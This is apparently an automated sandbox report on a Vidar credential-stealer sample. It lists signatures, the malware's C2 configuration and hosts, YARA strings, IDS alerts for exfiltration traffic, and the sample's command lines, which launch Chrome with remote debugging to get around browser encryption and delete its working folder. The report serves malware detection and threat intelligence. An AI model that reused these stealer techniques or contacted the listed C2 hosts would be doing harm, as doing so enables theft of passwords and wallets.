Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
Analysis ID:1632195
MD5:da8846245fb9ec49a3223f7731236c7f
SHA1:73189b12b69dc840ab373861748ba7fa0f4859c9
SHA256:a54c3a619f8fc2f69b09098a45f880c352de39c568235de9f988fce9bf8c6f48
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe" MD5: DA8846245FB9EC49A3223F7731236C7F)
    • chrome.exe (PID: 652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2220,i,9774722909908192130,17750005277753749404,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • cmd.exe (PID: 4944 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9h4wb" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5068 cmdline: timeout /t 11 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199829660832", "Botnet": "ir7am"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
  • 0x1e2ca:$str01: MachineID:
  • 0x1d553:$str02: Work Dir: In memory
  • 0x1e301:$str03: [Hardware]
  • 0x1e2b3:$str04: VideoCard:
  • 0x1dcb5:$str05: [Processes]
  • 0x1dcc1:$str06: [Software]
  • 0x1d5d0:$str07: information.txt
  • 0x1e036:$str08: %s\*
  • 0x1e083:$str08: %s\*
  • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x1db9f:$str12: UseMasterPassword
  • 0x1e30d:$str13: Soft: WinSCP
  • 0x1ddeb:$str14: <Pass encoding="base64">
  • 0x1e2f0:$str15: Soft: FileZilla
  • 0x1d5c2:$str16: passwords.txt
  • 0x1dbca:$str17: build_id
  • 0x1dc79:$str18: file_data

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe PID: 7696JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe PID: 7696JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1e2ca:$str01: MachineID:
          • 0x1d553:$str02: Work Dir: In memory
          • 0x1e301:$str03: [Hardware]
          • 0x1e2b3:$str04: VideoCard:
          • 0x1dcb5:$str05: [Processes]
          • 0x1dcc1:$str06: [Software]
          • 0x1d5d0:$str07: information.txt
          • 0x1e036:$str08: %s\*
          • 0x1e083:$str08: %s\*
          • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1db9f:$str12: UseMasterPassword
          • 0x1e30d:$str13: Soft: WinSCP
          • 0x1ddeb:$str14: <Pass encoding="base64">
          • 0x1e2f0:$str15: Soft: FileZilla
          • 0x1d5c2:$str16: passwords.txt
          • 0x1dbca:$str17: build_id
          • 0x1dc79:$str18: file_data
          1.0.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1e2ca:$str01: MachineID:
          • 0x1d553:$str02: Work Dir: In memory
          • 0x1e301:$str03: [Hardware]
          • 0x1e2b3:$str04: VideoCard:
          • 0x1dcb5:$str05: [Processes]
          • 0x1dcc1:$str06: [Software]
          • 0x1d5d0:$str07: information.txt
          • 0x1e036:$str08: %s\*
          • 0x1e083:$str08: %s\*
          • 0x1d806:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1db9f:$str12: UseMasterPassword
          • 0x1e30d:$str13: Soft: WinSCP
          • 0x1ddeb:$str14: <Pass encoding="base64">
          • 0x1e2f0:$str15: Soft: FileZilla
          • 0x1d5c2:$str16: passwords.txt
          • 0x1dbca:$str17: build_id
          • 0x1dc79:$str18: file_data

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Browser Started with Remote Debugging
          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, ParentProcessId: 7696, ParentProcessName: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 652, ProcessName: chrome.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:27.226476+010020442471Malware Command and Control Activity Detected95.217.27.252443192.168.2.449722TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:30.215995+010020518311Malware Command and Control Activity Detected95.217.27.252443192.168.2.449724TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:23.627833+010020490871A Network Trojan was detected192.168.2.44971895.217.27.252443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:33.381975+010020593311Malware Command and Control Activity Detected192.168.2.44972595.217.27.252443TCP
          2025-03-07T20:45:34.789851+010020593311Malware Command and Control Activity Detected192.168.2.44972695.217.27.252443TCP
          2025-03-07T20:45:35.821665+010020593311Malware Command and Control Activity Detected192.168.2.44972795.217.27.252443TCP
          2025-03-07T20:45:37.626947+010020593311Malware Command and Control Activity Detected192.168.2.44972895.217.27.252443TCP
          2025-03-07T20:45:41.030527+010020593311Malware Command and Control Activity Detected192.168.2.44972995.217.27.252443TCP
          2025-03-07T20:45:50.360247+010020593311Malware Command and Control Activity Detected192.168.2.44975195.217.27.252443TCP
          2025-03-07T20:45:51.360815+010020593311Malware Command and Control Activity Detected192.168.2.44975295.217.27.252443TCP
          2025-03-07T20:45:54.019261+010020593311Malware Command and Control Activity Detected192.168.2.44975395.217.27.252443TCP
          2025-03-07T20:45:54.707446+010020593311Malware Command and Control Activity Detected192.168.2.44975495.217.27.252443TCP
          2025-03-07T20:45:58.166445+010020593311Malware Command and Control Activity Detected192.168.2.44975595.217.27.252443TCP
          2025-03-07T20:45:59.643697+010020593311Malware Command and Control Activity Detected192.168.2.44975695.217.27.252443TCP
          2025-03-07T20:46:02.437370+010020593311Malware Command and Control Activity Detected192.168.2.44975795.217.27.252443TCP
          2025-03-07T20:46:04.764894+010020593311Malware Command and Control Activity Detected192.168.2.44975895.217.27.252443TCP
          2025-03-07T20:46:15.084949+010020593311Malware Command and Control Activity Detected192.168.2.44976195.217.27.252443TCP
          2025-03-07T20:46:18.248973+010020593311Malware Command and Control Activity Detected192.168.2.44976295.217.27.252443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:35.821665+010028596361Malware Command and Control Activity Detected192.168.2.44972795.217.27.252443TCP
          2025-03-07T20:45:37.626947+010028596361Malware Command and Control Activity Detected192.168.2.44972895.217.27.252443TCP
          2025-03-07T20:45:41.030527+010028596361Malware Command and Control Activity Detected192.168.2.44972995.217.27.252443TCP
          2025-03-07T20:45:54.019261+010028596361Malware Command and Control Activity Detected192.168.2.44975395.217.27.252443TCP
          2025-03-07T20:45:54.707446+010028596361Malware Command and Control Activity Detected192.168.2.44975495.217.27.252443TCP
          2025-03-07T20:45:58.166445+010028596361Malware Command and Control Activity Detected192.168.2.44975595.217.27.252443TCP
          2025-03-07T20:45:59.643697+010028596361Malware Command and Control Activity Detected192.168.2.44975695.217.27.252443TCP
          2025-03-07T20:46:02.437370+010028596361Malware Command and Control Activity Detected192.168.2.44975795.217.27.252443TCP
          2025-03-07T20:46:04.764894+010028596361Malware Command and Control Activity Detected192.168.2.44975895.217.27.252443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:45:20.652661+010028593781Malware Command and Control Activity Detected192.168.2.44971795.217.27.252443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://go.f.goldenloafuae.com/Avira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/ozillaAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/zAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/5Avira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/tAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/NAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.comAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/%Avira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/gAvira URL Cloud: Label: malware
          Source: https://go.f.goldenloafuae.com/dAvira URL Cloud: Label: malware
          Found malware configuration
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199829660832", "Botnet": "ir7am"}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeVirustotal: Detection: 65%Perma Link
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeReversingLabs: Detection: 57%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00406A10 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,1_2_00406A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00410830 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,1_2_00410830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040A150 BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,1_2_0040A150
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00406CF0 LocalAlloc,BCryptDecrypt,1_2_00406CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00406940 BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_00406940
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040A560 StrCmpCA,BCryptCloseAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_0040A560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00406980 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_00406980
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,1_2_00414E70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00407210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,1_2_0040B6B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,1_2_00415EB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,1_2_00408360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00413FD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,1_2_004013F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,1_2_00413580
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_004097B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,1_2_0040ACD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,1_2_00408C90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_00409560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,1_2_00413AF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49752 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49718 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49751 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49725 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49758 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49758 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49717 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49728 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49728 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49755 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49755 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49729 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49729 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49754 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49754 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49757 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49757 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.27.252:443 -> 192.168.2.4:49722
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49727 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49727 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49726 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.27.252:443 -> 192.168.2.4:49724
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49756 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49756 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49753 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49753 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49761 -> 95.217.27.252:443
          Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49762 -> 95.217.27.252:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199829660832
          Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
